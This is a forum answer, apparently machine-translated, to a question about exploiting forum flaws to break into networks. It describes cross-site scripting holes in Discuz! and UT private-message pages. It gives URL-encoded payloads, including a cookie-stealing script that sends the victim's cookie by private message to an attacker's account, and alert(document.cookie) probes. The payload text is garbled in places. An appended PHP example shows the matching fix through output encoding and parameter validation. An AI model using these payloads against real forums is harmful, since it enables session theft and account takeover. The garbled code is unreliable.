
What are the loopholes in the current dynamic forum? How to use these vulnerabilities to invade the mobile network?

In Discuz!, the subject of a post, reply, PM, etc. is not filtered, so code can be added there as well. For example:

/forum/pm.php? action=send%22,false); var % 20 forms = % 22 pmsubmit = Submit % 22 . tolowercase()% 2B % 22% 26 msgto = XXXXX % 26 subject = cookie % 26 save outbox = 0% 26 message = % 22% 2 be scape(documents . cookie); req . setrequestheader(% 22 content-length % 22,forms . length)% 3 breq . setrequestheader(% 22 content-TYPE % 22,% 22 application/x-www-form-urlencoded % 22). Req.send (form); Found% 3c/script% 3e% 3cb% 22

Discuz! and UT cross-site script vulnerability: the short-message cross-site script vulnerability is a very common one. For details, look at a statement like /phpbbs/pm.php?action=send&username=name: the name is displayed directly on the page where the short message is sent, without filtering, which opens the door to stealing cookies or more serious damage. Discuz! 3.x changed this to statements like /pm.php?action=send&uid=XXXX, which avoids this vulnerability, but there is no filtering when selecting the short-message folder.

Examples of the above vulnerability:

/phpbbs/pm.php?action=s...d&username=name%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cb%22

The above example displays your own cookie. (For Discuz! 1.X and Discuz! 2.X)

/pm.php?folder=Inbox%22%3e%3 ... Transcript%3e%3cb%

This displays your own cookie. (For Discuz! 3.X)

UT filters the subject, that is, %27 is converted into '; but the recipient is not filtered, so a similar vulnerability exists. The example is omitted. (Different UT forums have different code, but they all have similar vulnerabilities in general.)

I hope you accept this answer.
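
The missing filtering described in the answer above, shown as an added PHP example that is not Discuz! or UT code and not part of the original answer: the reflected recipient name is HTML-encoded on output, and the folder and uid parameters are validated against what the page expects. The function names, the folder list and the use of msgto as the input field name are assumptions.

```php
<?php
// Added example: a hypothetical PM page, not Discuz! or UT source code.

// Folder names this hypothetical page accepts (assumed list).
const PM_FOLDERS = ['inbox', 'outbox'];

// Encode a value for an HTML text node or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Unfiltered form, as the answer describes: the name is written straight
// into value="...", so a double quote in it ends the attribute.
function render_recipient_unsafe(string $username): string
{
    return '<input type="text" name="msgto" value="' . $username . '">';
}

// Corrected form: the same markup with the value encoded on output.
function render_recipient_safe(string $username): string
{
    return '<input type="text" name="msgto" value="' . h($username) . '">';
}

// folder: accept only known names, otherwise fall back to the inbox.
function pick_folder(string $folder): string
{
    return in_array($folder, PM_FOLDERS, true) ? $folder : 'inbox';
}

// uid: a short run of digits only; anything else is rejected.
function pick_uid(string $uid): ?int
{
    return (ctype_digit($uid) && strlen($uid) <= 9) ? (int) $uid : null;
}

// Constructed input: the decoded alert() test string from the answer.
$probe = 'name"><script>alert(document.cookie)</script><b"';

echo render_recipient_unsafe($probe), PHP_EOL; // markup is broken out of
echo render_recipient_safe($probe), PHP_EOL;   // value stays inside the attribute
echo pick_folder('inbox"><b'), PHP_EOL;        // falls back to the default folder
var_dump(pick_uid('12'), pick_uid('12"><b'));  // accepted uid, then rejected uid
```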